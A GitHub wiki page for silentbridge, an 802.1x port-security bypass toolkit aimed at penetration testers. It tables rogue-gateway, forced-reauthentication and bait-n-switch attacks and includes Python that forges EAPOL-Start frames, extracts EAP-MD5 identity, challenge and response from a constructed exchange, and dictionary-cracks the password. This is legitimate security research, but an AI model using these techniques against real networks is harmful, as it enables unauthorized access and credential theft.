Gabriel Ryan edited this page Jul 17, 2019 · 6 revisions

silentbridge

by Gabriel Ryan (@s0lst1c3) @ SpecterOps (gryan@specterops.io)

Overview

Silentbridge is a toolkit for quickly bypassing 802.1x port security, first presented at DEF CON 26. It improves upon existing techniques for bypassing 802.1x-2004 and introduces new techniques for attacking both 802.1x-2004 and 802.1x-2010 through their authentication process.

You can check out the accompanying whitepaper at https://www.researchgate.net/publication/327402715_Bypassing_Port_Security_In_2018_-_Defeating_MACsec_and_8021x-2010.

| Technique | Description | Defeats 802.1x-2004 | Defeats 802.1x-2010 / MACsec |
|---|---|---|---|
| Bridge-based 802.1x Bypass | Classical 802.1x bypass using Linux bridges. Places a rogue device between a supplicant and the authenticator without being detected and lets traffic flow through the rogue device, where it can be sniffed. Network interactivity is provided using Source NAT (SNAT) at Layers 2 and 3. | Yes | No |
| Rogue Gateway Attack | Steals EAP credentials by diverting the supplicant's traffic to a rogue authenticator controlled by the attacker, either purely in software or with mechanical A/B splitters. Because this is an attack against the authentication mechanism that grants access to the network, rather than against 802.1x's post-authentication protections, it is unaffected by the mitigations introduced in 802.1x-2010 when mechanical Ethernet splitters are used. | Yes | Yes (when the rogue device uses mechanical switching and the supplicant uses a weak EAP method) |
| Active Auth Analyzer and EAP Forced Reauthentication Attack | Forces the supplicant to reauthenticate by sending forged EAPOL-Start frames to the authenticator. The resulting authentication exchange is analyzed to determine the EAP method in use. If EAP-MD5 is used, the identity and hash are captured automatically. A classical attack against EAP-MD5 with a new twist. | Yes | No |
| Passive Auth Analyzer | Uses a passive tap to analyze the EAP authentication exchange and determine the EAP method in use. If EAP-MD5 is used, the identity and hash are captured automatically. | Yes | No |
| Bait n Switch Attack | Follow-up to the Rogue Gateway and EAP-MD5 Forced Reauthentication attacks. Disconnects the supplicant from the network and replaces it with the attacker's device: the attacker spoofs the supplicant's MAC and IP addresses and uses the stolen credentials to authenticate directly with the switch. Works best during off-hours, when a temporary disruption in service is likely to go unnoticed. | Yes | Yes (when the rogue device uses mechanical switching and the supplicant uses a weak EAP method) |
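
The forced-reauthentication and auth-analyzer rows above describe three concrete steps: forging an EAPOL-Start frame, reading the EAP exchange to identify the method, and, for EAP-MD5, recovering the identity, challenge and response hash. The following Python is an added example written for this page, not silentbridge's own code. It builds the EAPOL-Start frame, parses a constructed (not captured) EAP-MD5 exchange, and runs the dictionary check that EAP-MD5 permits because the response is simply MD5(identifier || password || challenge) (RFC 3748 section 5.4, RFC 1994). The MAC addresses, challenge, identity `corp\jsmith` and password are all made-up sample values.

```python
"""EAP-MD5 analysis helpers (added example; not silentbridge code)."""
import hashlib
import struct

PAE_GROUP_MAC = bytes.fromhex("0180c2000003")  # 802.1X PAE group address
ETH_P_EAPOL = 0x888E
EAPOL_EAP_PACKET, EAPOL_START = 0, 1
EAP_REQUEST, EAP_RESPONSE = 1, 2
EAP_TYPE_IDENTITY, EAP_TYPE_MD5 = 1, 4


def eth(src: bytes, payload: bytes, dst: bytes = PAE_GROUP_MAC) -> bytes:
    """Ethernet II frame carrying an EAPOL payload."""
    return dst + src + struct.pack("!H", ETH_P_EAPOL) + payload


def build_eapol_start(src_mac: bytes) -> bytes:
    """EAPOL-Start (EAPOL v2) forged from the supplicant's MAC to force reauthentication."""
    return eth(src_mac, struct.pack("!BBH", 2, EAPOL_START, 0))


def build_eap(code: int, ident: int, eap_type: int, data: bytes) -> bytes:
    """EAP packet (RFC 3748) wrapped in an EAPOL EAP-Packet header."""
    eap = struct.pack("!BBHB", code, ident, 5 + len(data), eap_type) + data
    return struct.pack("!BBH", 2, EAPOL_EAP_PACKET, len(eap)) + eap


def md5_challenge_data(value: bytes, name: bytes = b"") -> bytes:
    """MD5-Challenge type-data: Value-Size, Value, Name."""
    return bytes([len(value)]) + value + name


def parse_frame(frame: bytes):
    """Parse Ethernet/EAPOL/EAP fields; returns None for non-EAPOL frames."""
    if len(frame) < 18 or struct.unpack("!H", frame[12:14])[0] != ETH_P_EAPOL:
        return None
    _ver, ptype, plen = struct.unpack("!BBH", frame[14:18])
    info = {"src": frame[6:12], "eapol_type": ptype}
    eap = frame[18:18 + plen]
    if ptype != EAPOL_EAP_PACKET or len(eap) < 4:
        return info
    code, ident, length = struct.unpack("!BBH", eap[:4])
    info.update(code=code, id=ident)
    if length > 4:  # Success/Failure carry no Type field
        info["eap_type"] = eap[4]
        body = eap[5:length]
        if eap[4] == EAP_TYPE_IDENTITY:
            info["identity"] = body
        elif eap[4] == EAP_TYPE_MD5 and body:
            vsize = body[0]
            info["value"], info["name"] = body[1:1 + vsize], body[1 + vsize:]
    return info


def analyze_exchange(frames):
    """Pull EAP method, identity, EAP id, challenge and response hash from an exchange."""
    out = {"method": None, "identity": None, "id": None, "challenge": None, "response": None}
    for f in frames:
        p = parse_frame(f)
        if not p or p["eapol_type"] != EAPOL_EAP_PACKET:
            continue
        t = p.get("eap_type")
        if t == EAP_TYPE_IDENTITY:
            if p["code"] == EAP_RESPONSE:
                out["identity"] = p["identity"]
        elif t == EAP_TYPE_MD5:
            out["method"] = "EAP-MD5"
            if p["code"] == EAP_REQUEST:
                out["challenge"], out["id"] = p["value"], p["id"]
            elif p["code"] == EAP_RESPONSE and p["id"] == out["id"]:
                out["response"] = p["value"]
        elif t is not None and out["method"] is None:
            out["method"] = f"EAP type {t}"  # e.g. 13 = EAP-TLS, 25 = PEAP
    return out


def crack_eap_md5(eap_id: int, challenge: bytes, response: bytes, wordlist):
    """Response = MD5(Identifier || password || Challenge); return the matching word or None."""
    for pw in wordlist:
        if hashlib.md5(bytes([eap_id]) + pw.encode() + challenge).digest() == response:
            return pw
    return None


# Constructed sample exchange (not a real capture). All values are made up.
SUPPLICANT = bytes.fromhex("001122334455")
AUTHENTICATOR = bytes.fromhex("00aabbccddee")
SAMPLE_CHALLENGE = bytes.fromhex("00112233445566778899aabbccddeeff")
SAMPLE_PASSWORD = "Winter2018!"
SAMPLE_RESPONSE = hashlib.md5(bytes([7]) + SAMPLE_PASSWORD.encode() + SAMPLE_CHALLENGE).digest()
SAMPLE_EXCHANGE = [
    build_eapol_start(SUPPLICANT),
    eth(AUTHENTICATOR, build_eap(EAP_REQUEST, 6, EAP_TYPE_IDENTITY, b""), SUPPLICANT),
    eth(SUPPLICANT, build_eap(EAP_RESPONSE, 6, EAP_TYPE_IDENTITY, b"corp\\jsmith")),
    eth(AUTHENTICATOR, build_eap(EAP_REQUEST, 7, EAP_TYPE_MD5,
                                 md5_challenge_data(SAMPLE_CHALLENGE, b"nas01")), SUPPLICANT),
    eth(SUPPLICANT, build_eap(EAP_RESPONSE, 7, EAP_TYPE_MD5,
                              md5_challenge_data(SAMPLE_RESPONSE, b"corp\\jsmith"))),
]

if __name__ == "__main__":
    r = analyze_exchange(SAMPLE_EXCHANGE)
    print(r["method"], r["identity"], r["id"], r["challenge"].hex(), r["response"].hex())
    print("password:", crack_eap_md5(r["id"], r["challenge"], r["response"],
                                     ["password", "Summer2018!", SAMPLE_PASSWORD]))
```

Putting the forged EAPOL-Start on the wire (an `AF_PACKET` raw socket bound to the switch-facing interface) and sniffing the reply frames are left out; the point here is the frame layout and why a captured EAP-MD5 exchange is enough to attack the password offline. Note that the Identifier byte mixed into the hash is the one from the MD5-Challenge request, not the one from the Identity round, so the analyzer must pair the response with the request that carries the same id.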

Getting Started

To get started with silentbridge, check out Software Setup and Hardware Setup for software and hardware installation instructions.

This document contains two sets of instructions for configuring a device to use silentbridge. The first covers defeating 802.1x-2004, which should cover the vast majority of pentesting scenarios, and is intended to get users up and running quickly with minimal effort. The second covers setting up a device that can use silentbridge to bypass 802.1x-2010; it is intended for users who are comfortable assembling electronics equipment.

Once you have silentbridge up and running, check out the following sections for usage instructions: